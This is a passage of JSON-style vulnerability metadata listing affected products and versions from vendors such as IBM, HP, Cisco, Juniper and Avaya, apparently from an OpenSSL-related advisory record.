"version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "systems insight manager update", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.31" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.51" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.21" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power system s822l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504667" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.10" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205587" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "ringmaster appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.60" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.19" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "ctpview 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "cognos controller interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.41" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bladecenter js22", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-61x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.5" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.20" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.32" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.15" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "src series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "iptv", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "web security appliance 9.0.0 -fcs", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "bladecenter js23", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage 7.3.2.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056330" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "bladecenter js43 with feature code", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x8446)0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.51" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x330073820" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2" }, { "model": "power system s824", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ctp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7500" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "power systems e880", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ctpos 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "mq appliance m2000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "screenos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.10" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734-" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.5" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "mobile wireless transport manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.61" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.20" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.90" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.02" }, { "model": "bladecenter js12 express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-60x)0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0(4.29)" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.5" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "websphere mq client for hp integrity nonstop server supportpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-0" }, { "model": "mobile security suite mss", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.20" }, { "model": "cognos controller if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "flex system p24l compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "websphere mq for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "power system s812l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "mobile messaging and m2m client pack (eclipse paho mqtt c client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pulse secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.00" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731-" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "insight control", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "server migration pack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "cognos controller fp1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2(3.1)" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.4" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.20" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "server migration pack", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.01" }, 